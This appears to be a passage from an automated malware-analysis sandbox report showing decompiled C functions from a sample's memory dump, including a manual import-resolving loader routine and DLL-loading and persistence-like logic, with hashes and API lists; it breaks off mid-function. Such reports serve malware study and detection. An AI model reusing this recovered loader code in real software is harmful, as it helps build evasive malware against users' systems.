Instruction ID: bbbe2e048bdb7ca281e90c8594452977dd6133e52a65fc6598db3d6a90d98c7d
Opcode Fuzzy Hash: 24234036bd44549ce90901f02aea0baf555124e47afd939409f04462bb315129
Instruction Fuzzy Hash: DA512871D00219AFEB41CFA4CC85FDEBBB9FB08380F514169F604E7255EB75AA448B61

Uniqueness

Uniqueness Score: -1.00%

Function 1001249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1001249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E1000E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v36 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 100124B8
LoadLibraryA.KERNEL32(00000000), ref: 10012551

Strings

GetProcAddress, xrefs: 100124C1
kernel32.dll, xrefs: 100124B3

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: GetProcAddress$kernel32.dll
API String ID: 4133054770-1584408056
Opcode ID: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
Instruction ID: 32dcb2393de001d92d0e2ea9b2cd9e3cf8e07861903f3f539e44592daf5cdc58
Opcode Fuzzy Hash: aaea8c4d1095c55f87203bc05215dd3fb8d347464425403934247a8dda217c55
Instruction Fuzzy Hash: 7A617AB5D00209EFDB40CF98C881BADBBF1FF08355F208599E815AB2A1C774AA90DF50

Uniqueness

Uniqueness Score: -1.00%

Function 1000C4CE, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117
libraryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E1000C4CE(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void _v140;
				signed char _t14;
				char _t15;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t32;
				WCHAR* _t34;
				intOrPtr _t35;
				struct HINSTANCE__* _t37;
				int _t38;
				intOrPtr _t46;
				void* _t47;
				intOrPtr _t50;
				void* _t60;
				void* _t61;
				char _t62;
				char* _t63;
				void* _t65;
				intOrPtr _t66;
				char _t68;

				_t65 = __esi;
				_t61 = __edi;
				_t47 = __ebx;
				_t50 =  *0x1001e688; // 0x2e50590
				_t14 =  *(_t50 + 0x1898);
				if(_t14 == 0x100 ||  *((intOrPtr*)(_t50 + 4)) >= 0xa && (_t14 & 0x00000004) != 0) {
					_t15 = E100095E1(_t50, 0xb62);
					_t66 =  *0x1001e688; // 0x2e50590
					_t62 = _t15;
					_t67 = _t66 + 0xb0;
					_v8 = _t62;
					E10009640( &_v140, 0x40, L"%08x", E1000D400(_t66 + 0xb0, E1000C379(_t66 + 0xb0), 0));
					_t20 =  *0x1001e688; // 0x2e50590
					asm("sbb eax, eax");
					_t25 = E100095E1(_t67, ( ~( *(_t20 + 0xa8)) & 0x00000068) + 0x615);
					_t63 = "\\";
					_t26 =  *0x1001e688; // 0x2e50590
					_t68 = E100092E5(_t26 + 0x1020);
					_v12 = _t68;
					E100085D5( &_v8);
					_t32 =  *0x1001e688; // 0x2e50590
					_t34 = E100092E5(_t32 + 0x122a);
					 *0x1001e784 = _t34;
					_t35 =  *0x1001e684; // 0x2ecfaa0
					 *((intOrPtr*)(_t35 + 0x110))(_t68, _t34, 0, _t63,  &_v140, ".", L"dll", 0, _t63, _t25, _t63, _t62, 0, _t61, _t65, _t47);
					_t37 = LoadLibraryW( *0x1001e784);
					 *0x1001e77c = _t37;
					if(_t37 == 0) {
						_t38 = 0;
					} else {
						_push(_t37);
						_t60 = 0x28;
						_t38 = E1000E171(0x1001bb48, _t60);
					}
					 *0x1001e780 = _t38;
					E1000861A( &_v12, 0xfffffffe);
					memset( &_v140, 0, 0x80);
					if( *0x1001e780 != 0) {
						goto L10;
					} else {
						E1000861A(0x1001e784, 0xfffffffe);
						goto L8;
					}
				} else {
					L8:
					if( *0x1001e780 == 0) {
						_t46 =  *0x1001e6bc; // 0x2ecfbc8
						 *0x1001e780 = _t46;
					}
					L10:
					return 1;
				}
			}

APIs

LoadLibraryW.KERNEL32 ref: 1000C5C6
memset.MSVCRT ref: 1000C605

Strings

%08x, xrefs: 1000C52F
dll, xrefs: 1000C588

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: LibraryLoadmemset
String ID: %08x$dll
API String ID: 3406617148-2963171978
Opcode ID: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
Instruction ID: 605655cd81f1f69b7fa92b991eeeb1d6cfabf96bce0b9214bc1f1ebdb38bd664
Opcode Fuzzy Hash: 43948bddfd1750ecd2ded6eac0453c4b4ed6b088884f12521d2ac14b5d2ae194
Instruction Fuzzy Hash: 3331E3B2904358ABFB10CBA4DC89F9E33ECEB58394F408029F105E7191EB35EE818724

Uniqueness

Uniqueness Score: -1.00%

Function 10012D70, Relevance: 6.6, APIs: 5, Instructions: 341
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E10012D70(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x8b3c7e89
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xa1ec8b55
					_t12 = _t272 + 0x5c; // 0x84e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E10015D90(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E10014AF0(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x84e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E10014C30( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xa1ec8b55
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xa1ec8b55
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0xdf750008
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xa1ec8b55
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xa1ec8b55
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x84e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0xdf750008
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xa1ec8b55
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E10014C30(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xa1ec8b55
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x84e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x84e85000
							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E10014AF0( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x84e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}

APIs

memcpy.MSVCRT ref: 10012E7D
memcpy.MSVCRT ref: 10012EF4
memcpy.MSVCRT ref: 10012F23
memcpy.MSVCRT ref: 10012F4F
memcpy.MSVCRT ref: 10013004

Part of subcall function 10015D90: memcpy.MSVCRT ref: 10015E6E

Part of subcall function 10014AF0: memcpy.MSVCRT ref: 10014B1A

Memory Dump Source

Source File: 00000009.00000002.554724800.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.554640599.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50

Uniqueness

Uniqueness Score: -1.00%

Function 10004D6D, Relevance: 6.4, APIs: 4, Instructions: 432
stringCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x1001e688; // 0x2e50590
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
					E1000A86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E1000A471( &_v556, _t298);
					 *0x1001e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
						 *_t337 = 0x610;
						_t124 = E100095E1(0x1001b9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x1001e688; // 0x2e50590
						_t127 = E100092E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E100085D5( &_v612);
						_t130 = E1000B269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E1000861A( &_v616, 0xfffffffe);
						_t133 =  *0x1001e688; // 0x2e50590
						_t22 = _t133 + 0x114; // 0x2e506a4
						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x1001e688; // 0x2e50590
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0x1001e680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E1000E2C6(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0x1001e6b4; // 0x2ecfc48
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E1000E2C6(_t353,  &_v588);
								_t235 =  *0x1001e6b4; // 0x2ecfc48
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x1001e73c;
							if( *0x1001e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x1001e680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x1001e688; // 0x2e50590
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E100049A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x1001e684; // 0x2ecfaa0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x1001e688; // 0x2e50590
											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E10008604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E1000109A(_t262, 0x148);
													_t305 =  *0x1001e688; // 0x2e50590
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E1000902D(_t271,  &_v572);
													_t272 =  *0x1001e688; // 0x2e50590
													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x1001e688; // 0x2e50590
														__eflags = _t200 + 0x1020;
														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E100085D5( &_v636);
														E1000A911(_t333, 0, 0xbb8, 1);
														E1000861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E1000861A( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E100049A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x1001e684; // 0x2ecfaa0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E10008604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E100095E1(_t278, 0x32d);
										_t280 =  *0x1001e688; // 0x2e50590
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E100085D5( &_v636);
										E1000A911(_t249, 0, 0xbb8, 1);
										E1000861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E100095E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x1001e688; // 0x2e50590
								_t329 = E100092E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E1000B269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x1001e684; // 0x2ecfaa0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E1000861A( &_v612, 0xfffffffe);
								}
								E100085D5( &_v616);
								_t150 =  *0x1001e688; // 0x2e50590
								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
								_t153 =  *0x1001e688; // 0x2e50590
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x1001e738, 0x105);
								_t331 =  *0x1001e688; // 0x2e50590
								_t117 = _t331 + 0x228; // 0x2e507b8
								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
								E1000861A(0x1001e740, 0xfffffffe);
								E1000861A(0x1001e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
